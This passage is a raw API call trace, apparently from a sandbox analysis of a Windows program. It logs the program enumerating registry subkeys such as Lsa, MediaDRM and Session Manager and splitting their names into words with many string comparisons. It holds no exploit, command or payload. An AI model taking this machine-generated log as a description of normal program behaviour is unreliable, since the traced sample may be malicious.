returned 0x4b4098 [0068.905] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0068.905] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0068.905] lstrlenW (lpString="GraphicsDrivers") returned 15 [0068.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b40c0 [0068.905] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0068.905] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0068.905] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0068.905] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0068.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b40e8 [0068.905] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0068.905] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0068.906] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0068.906] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0068.906] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0068.906] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0068.906] lstrlenW (lpString="GroupOrderList") returned 14 [0068.906] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b99e0 [0068.906] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0068.906] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0068.906] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0068.906] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9a00 [0068.906] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0068.906] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0068.906] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0068.906] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0068.906] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9a20 [0068.906] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0068.906] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0068.906] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0068.906] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0068.906] lstrlenW (lpString="HAL") returned 3 [0068.906] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9a40 [0068.906] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0068.907] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0068.907] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0068.907] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0068.907] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0068.907] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0068.907] lstrlenW (lpString="IDConfigDB") returned 10 [0068.907] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b4110 [0068.907] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0068.907] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0068.907] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0068.907] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0068.907] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0068.907] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9a60 [0068.907] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0068.907] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0068.907] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0068.907] lstrlenW (lpString="Keyboard Layout") returned 15 [0068.907] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b4138 [0068.907] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0068.907] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0068.907] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0068.907] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0068.908] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4160 [0068.908] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0068.908] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0068.908] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0068.908] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0068.908] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0068.908] lstrlenW (lpString="Keyboard Layouts") returned 16 [0068.908] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b4188 [0068.908] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0068.908] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0068.908] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4188 | out: hHeap=0x4a0000) returned 1 [0068.908] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b4188 [0068.908] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0068.908] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0068.909] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0068.909] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0068.909] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0068.909] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0068.909] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0068.909] lstrlenW (lpString="Lsa") returned 3 [0068.909] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9a80 [0068.909] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0068.909] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0068.909] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0068.909] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9aa0 [0068.909] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0068.909] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0068.910] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9aa0 | out: hHeap=0x4a0000) returned 1 [0068.910] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4b41b0 [0068.910] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0068.910] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0068.910] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b41d8 [0068.910] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0068.910] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0068.910] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0068.910] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0068.910] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0068.910] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0068.910] lstrlenW (lpString="LsaInformation") returned 14 [0068.910] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9aa0 [0068.910] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0068.910] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0068.910] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9aa0 | out: hHeap=0x4a0000) returned 1 [0068.910] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4ba188 [0068.911] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0068.911] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0068.911] lstrlenW (lpString="MediaCategories") returned 15 [0068.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9aa0 [0068.911] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0068.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4ba1b8 [0068.911] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0068.911] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0068.911] lstrlenW (lpString="MediaDRM") returned 8 [0068.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ac0 [0068.911] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0068.911] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0068.911] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0068.911] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ac0 | out: hHeap=0x4a0000) returned 1 [0068.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9ac0 [0068.911] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0068.912] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0068.912] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0068.912] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0068.912] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0068.912] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0068.912] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0068.912] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0068.912] lstrlenW (lpString="MediaInterfaces") returned 15 [0068.912] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ae0 [0068.912] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0068.912] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0068.912] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0068.912] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0068.912] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0068.912] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0068.912] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ae0 | out: hHeap=0x4a0000) returned 1 [0068.912] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4ba1e8 [0068.912] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0068.912] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0068.912] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0068.912] lstrlenW (lpString="MediaProperties") returned 15 [0068.913] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ae0 [0068.913] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0068.913] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0068.913] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ae0 | out: hHeap=0x4a0000) returned 1 [0068.913] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4ba218 [0068.913] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0068.913] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0068.913] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0068.913] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0068.913] lstrlenW (lpString="MediaTypes") returned 10 [0068.913] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ae0 [0068.913] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0068.913] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0068.913] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0068.913] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9ae0 | out: hHeap=0x4a0000) returned 1 [0068.913] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ae0 [0068.914] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0068.914] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0068.914] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0068.914] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0068.914] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0068.914] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0068.914] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0068.914] lstrlenW (lpString="MobilePC") returned 8 [0068.914] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba260 [0068.914] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0068.914] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0068.914] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0068.914] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0068.914] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0068.914] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0068.914] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9b00 [0068.914] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0068.914] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0068.914] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0068.914] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0068.914] lstrlenW (lpString="MPDEV") returned 5 [0068.914] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9b20 [0068.915] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0068.915] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0068.915] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0068.915] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0068.915] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0068.915] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0068.915] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0068.915] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0068.915] lstrlenW (lpString="MSDTC") returned 5 [0068.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9b40 [0068.915] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0068.915] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0068.915] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0068.915] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0068.915] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0068.915] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0068.915] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0068.915] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0068.915] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0068.915] lstrlenW (lpString="MUI") returned 3 [0068.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9b60 [0068.915] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0068.916] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0068.916] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0068.916] lstrlenW (lpString="NetDiagFx") returned 9 [0068.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9b80 [0068.916] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0068.916] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0068.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9ba0 [0068.916] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0068.917] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0068.917] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0068.917] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0068.917] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9bc0 [0068.917] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0068.917] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0068.917] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0068.917] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0068.918] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0068.918] lstrlenW (lpString="NetTrace") returned 8 [0068.918] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9be0 [0068.918] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0068.918] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0068.918] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9be0 | out: hHeap=0x4a0000) returned 1 [0068.918] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9be0 [0068.918] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0068.918] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0068.918] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0068.918] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0068.918] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0068.919] lstrlenW (lpString="Network") returned 7 [0068.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba288 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0068.919] lstrlenW (lpString="NetworkProvider") returned 15 [0068.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba2b0 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0068.919] lstrlenW (lpString="Nls") returned 3 [0068.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9c00 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0068.919] lstrlenW (lpString="NodeInterfaces") returned 14 [0068.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9c20 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0068.919] lstrlenW (lpString="Nsi") returned 3 [0068.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9c40 [0068.919] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0068.919] lstrlenW (lpString="PCW") returned 3 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b9c60 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0068.920] lstrlenW (lpString="PnP") returned 3 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9c80 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0068.920] lstrlenW (lpString="Power") returned 5 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9ca0 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0068.920] lstrlenW (lpString="Print") returned 5 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9cc0 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0068.920] lstrlenW (lpString="PriorityControl") returned 15 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba2d8 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0068.920] lstrlenW (lpString="ProductOptions") returned 14 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba300 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0068.920] lstrlenW (lpString="Remote Assistance") returned 17 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba350 [0068.920] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0068.920] lstrlenW (lpString="SafeBoot") returned 8 [0068.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9ce0 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0068.921] lstrlenW (lpString="ScsiPort") returned 8 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9d20 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0068.921] lstrlenW (lpString="SecurePipeServers") returned 17 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4ba378 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0068.921] lstrlenW (lpString="SecurityProviders") returned 17 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4ba3c8 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0068.921] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba418 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0068.921] lstrlenW (lpString="ServiceProvider") returned 15 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba440 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0068.921] lstrlenW (lpString="Session Manager") returned 15 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4ba440 [0068.921] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0068.921] lstrlenW (lpString="SNMP") returned 4 [0068.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9d80 [0068.922] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0068.922] lstrlenW 